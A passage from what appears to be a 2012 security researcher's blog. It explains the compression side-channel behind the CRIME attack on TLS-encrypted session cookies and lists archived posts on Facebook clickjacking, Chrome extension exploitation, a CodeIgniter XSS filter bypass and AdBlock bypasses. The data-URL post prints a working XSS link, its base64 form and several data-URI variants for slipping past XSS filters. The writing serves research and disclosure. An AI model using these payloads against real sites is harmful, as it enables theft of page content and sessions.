  • Encrypted connection to attacked domain (e.g. victim uses https://mybank.com ) with cookies
  • Adaptive Javascript code able to send POST requests to attacked domain
Javascript code tried bruteforcing the cookie value character-by-character. The m-i-t-m component was observing the ciphertext, looking for differences, and once it found one, it communicated with the Javascript to proceed to next character.

CRIME should be similar:
By running JavaScript code in the browser of the victim and sniffing HTTPS traffic, we can decrypt session cookies," Rizzo told Threatpost. "We don't need to use any browser plugin and we use JavaScript to make the attack faster, but in theory we could do it with static HTML. (source)
but the details are not yet known, they are to be released later this month at Ekoparty.

However, there are already speculations on what could the attack rely on. In fact, Thomas Pornin at security.stackexchange.com have most likely figured it out correctly. The hypothesis is that Rizzo and Duong abuse data compression within the encrypted connection. It's likely as e.g. Chromium disabled TLS compression recently.
Compression-based leakage Thanks to Cross Origin Resource Sharing it is possible (and easy) for JS to send POST request with arbitrary body cross domain. One has limited control over request headers though - e.g. the cookie header will be either attached in full or not at all (it's not possible to set cookies cross-domain). But, the attacker can construct request that looks like this:
POST / HTTP/1.1
Host: thebankserver.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1
Accept: */*
Cookie: secret=XS8b1MWZ0QEKJtM1t+QCofRpCsT2u
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

POST / HTTP/1.1
Host: thebankserver.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1
Accept: */*
Cookie: secret=?

To put it simply, in the POST body we're duplicating part of POST headers. This should compress very nicely. We would know most of the header values (from browser fingerprinting, navigator object etc.), only the cookie value is unknown.

But, we can bruteforce the first character of the cookie by including it in the POST body (we have no control over headers) after the secret= string. By observing the compressed ciphertext length (man in the middle) for all such requests we should be able to spot the difference in one of them. The ciphertext would be shorter due to better compression (longer string occured twice in the request). Then, communicate with JS to proceed to next character and the process continues until the whole cookie value is bruteforced.

That's the theory, at least.
PoC or didn't happen !
There's no time to repeat the whole man-in-the-middle, adaptive JS, encrypted connection set up, so xorninja wrote a script to check the length of zlib deflated HTTP request strings and deduce the cookie values from there. It didn't work, so I've modified the code by adding an adaptive algorithm (encryption length does not always change, sometimes you have to also mutate the POST body to be certain of a character value etc.)

And it works.
Proof of concept can bruteforce the cookie value based on zlib deflated string length only. Cookies can be of arbitrary lengths.
So, what next?
This PoC would have to be included in the whole SSL/mitm/Javascript BEAST-like context so we can check if it actually works in browsers and leaks real-life cookies. Feel free to experiment. I'm waiting for the actual CRIME disclosure.

Friday, August 24, 2012

Hack In Paris talk and future events

Videos of recent Hack In Paris 2012 conference have just been published, among those there is a recording of my talk: "HTML5 - something wicked this way comes":



With accompanying slides:



Plans for next few months:
  • BruCON (24-25.09, Ghent, Belgium) - Kyle 'Kos' Osborn & Krzysztof Kotowicz - Advanced Chrome Extension Exploitation
  • Security BSides (12-14.10, Warsaw, Poland) - I’m in your browser, pwning your stuff: Atakowanie poprzez rozszerzenia Google Chrome
  • Secure 2012 (22-24.10, Warsaw, Poland) - Atakowanie przy użyciu HTML5 w praktyce
And a few neat exploits in the queue, waiting to be released ;)

Friday, August 17, 2012

How Facebook lacked X-Frame-Options and what I did with it

In September 2011 I've discovered a vulnerability that allows attacker to partially take control over victim's Facebook account. Vulnerability allowed, among other things, to send status updates on behalf of user and send friend requests to attackers' controlled Facebook account. The vulnerability has been responsibly disclosed as part of Facebook Security Bug Bounty program and is now fixed.

Thursday, July 26, 2012

XSS ChEF - Chrome extension exploitation framework

Recently I've been busy with my new little project. What started out as a proof of concept suddenly became good enough to demonstrate it with Kyle Osborn at BlackHat, so I decided I might just present it here too ;)

Thursday, July 19, 2012

CodeIgniter <= 2.1.1 xss_clean() Cross Site Scripting filter bypass

This is a security advisory for popular PHP framework - CodeIgniter. I've found several bypasses in xss sanitization functions in the framework. These were responsibly disclosed to the vendor and are now fixed in version 2.1.2. (CVE-2012-1915).

Friday, April 6, 2012

Fun with data: URLs

Data URLs, especially in their base64 encoding can often be used for anti XSS filter bypasses. This gets even more important in Firefox and Opera, where newly opened documents retain access to opening page. So attacker can trigger XSS with only this semi-innocent-link:
<a target=_blank href="data:text/html,<script>alert(opener.document.body.innerHTML)</script>">clickme in Opera/FF</a>
or even use the base64 encoding of the URL:
data:text/html;base64,PHNjcmlwdD5hbGVydChvcGVuZXIuZG9jdW1lbnQuYm9keS5pbm5lckhUTUwrMTApPC9zY3JpcHQ+
Chrome will block the access to originating page, so that attacker has limited options:

But what if particular XSS filter knows about data: URIs and tries to reject them? We bypass, of course :) I've been fuzzing data: URIs syntax recently and I just thought you might find below examples interesting:
data:text/html;base64wakemeupbeforeyougogo,[content] // FF, Safari
data:text/html:;base64,[content]
data:text/html:[plenty-of-whitespace];base64,[content]
data:text/html;base64,,[content] // Opera


Here are full fuzz results for vector:
data:text,html;<before>base64<after>,[base64content]

BrowserBefore (ASCII)After (ASCII)
Firefox 11 9,10,13,59 anything
Safari 5.1 9,10,13,59 anything
Chrome 18 9,10,13,32,59 9,10,13,32,59
Opera 11.6 9,10,13,32,59 9,10,13,32,44,59

Not a ground-breaking result, but it may come in handy one day for you, like it did for me.

Tuesday, March 27, 2012

Chrome addons hacking: Bye Bye AdBlock filters!

Continuing the Chrome extension hacking (see part 1 and 2), this time I'd like to draw you attention to the oh-so-popular AdBlock extension. It has over a million users, is being actively maintained and is a piece of a great software (heck, even I use it!). However - due to how Chrome extensions work in general it is still relatively easy to bypass it and display some ads. Let me describe two distinct vulnerabilities I've discovered. They are both exploitable in the newest 2.5.22 version.

tl;dr: Chrome AdBlock 2.5.22 bypasses, demo here and here, but I'd advise you to read on.